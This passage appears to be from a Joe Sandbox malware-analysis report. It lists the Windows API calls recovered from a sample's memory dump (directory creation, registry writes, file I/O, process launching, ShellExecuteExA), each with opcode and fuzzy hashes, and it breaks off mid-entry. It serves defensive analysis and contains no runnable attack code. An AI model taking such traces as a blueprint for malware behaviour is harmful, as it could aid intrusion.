• Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
• Instruction ID: 7e700ee3acf44982365c3fbd0e808c401ff2a4825d9ccd2943b1641dd8ae7ae4
• Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
• Instruction Fuzzy Hash: ABD0A932004022ABC2002728AE0C88BBB90DB00270702CA35FCA4A22B1DB300C529A98
APIs
• CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
• GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
• Instruction ID: 5acf7b5c2778cbfdcbae9b0437cf869adc97d3df665aa26c8b081b4f29c10bb0
• Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
• Instruction Fuzzy Hash: 53C04C30204501EFDA106B209E08B177AD0AB50741F2548396146E10A0DA789455F92E
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
• Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
• Opcode Fuzzy Hash: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
• Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
APIs
• SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: PathSearch
• String ID:
• API String ID: 2203818243-0
• Opcode ID: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
• Instruction ID: eb17f69382d89759ebdee5c9dd5d6a4f0c1420afe9db4a8697d1259c8666677d
• Opcode Fuzzy Hash: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
• Instruction Fuzzy Hash: 80E0D871304110EFD710DF649E49BAB3758DB01368B20817AF111A60C1D5B89905872D
APIs
• RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FB1
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                    • Instruction ID: 0f1f398a2e861ffee82e275805f4c84720ea89191264ee960a0e3bcb1bee2725
                                                                                                    • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                    • Instruction Fuzzy Hash: DAE0ECB211450ABEEF099F90DC0ADBB371DEB04300F10492EF956E5090E6B9AE30AE75
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
• Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
• Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
• Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
• Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4
APIs
• GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
• Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
• Opcode Fuzzy Hash: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
• Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FE8,?,?,?,?,00000002,: Completed), ref: 00405F7E
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
• Instruction ID: f6689eb4189efde595c0db3434e8a658027b475c8950a5948bd102936423b03e
• Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
• Instruction Fuzzy Hash: A4D0123210420EBBDF119F90DD05FAB371DEB08314F108426FE16A4091D775D930AB64
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
• Instruction ID: 91fe89217483e075e92c8728b5a4931aee7e8ed68981fb3eb44f78270fd31ef9
• Opcode Fuzzy Hash: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
• Instruction Fuzzy Hash: 25D0C232704114DBCB00EFA49B0868E73A1EB00324B30C137E011F21C1D6B8CA059A2D
APIs
• SendMessageA.USER32(0001043E,00000000,00000000,00000000), ref: 004041B6
Memory Dump Source
• Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
• Instruction ID: 112480d2ae0494b2a53595d3f997b831fbc8a903dfd304933042e2292820a1e0
• Opcode Fuzzy Hash: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
• Instruction Fuzzy Hash: 40C09B757447007FDA109B649E49F0777D4A791700F14842DB740F50D1D674D450D65C
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,0001C3E4), ref: 004032EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                    • Instruction ID: 18e6939d06ef43c2e98f2159044487ea81de3fce7c02a663ceb4602929a6bce1
                                                                                                    • Opcode Fuzzy Hash: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                    • Instruction Fuzzy Hash: A2B09235184A00AFDA114B10DE09F457A62E7A4701F008028B240240F0CAB200A5EB09
                                                                                                    APIs
                                                                                                    • ShellExecuteExA.SHELL32(?,00401F5C,?), ref: 004057C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteShell
                                                                                                    • String ID:
                                                                                                    • API String ID: 587946157-0
                                                                                                    • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                    • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                    • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                    • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403F56), ref: 00404184
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                    • Instruction ID: da82fd3536d89c96f0dffd23ebfb530c9c189a59b1cea2a2009ac9f088f6e34b
                                                                                                    • Opcode Fuzzy Hash: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                    • Instruction Fuzzy Hash: E4A00176444A40AFCA02AF50EF09D0ABB62ABA4701B12897AE295900348B765872EB19
                                                                                                    APIs
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                      • Part of subcall function 00405773: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                      • Part of subcall function 00405773: CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FC0
                                                                                                      • Part of subcall function 00406552: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F76,?,?,?,?,?,?), ref: 00406563
                                                                                                      • Part of subcall function 00406552: GetExitCodeProcess.KERNEL32(?,?), ref: 00406585
                                                                                                      • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2972824698-0
                                                                                                    • Opcode ID: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                    • Instruction ID: 38ff014a8e4085178bb50f003d2faa90d0cc15d8516b8928bc727fcbc0eca729
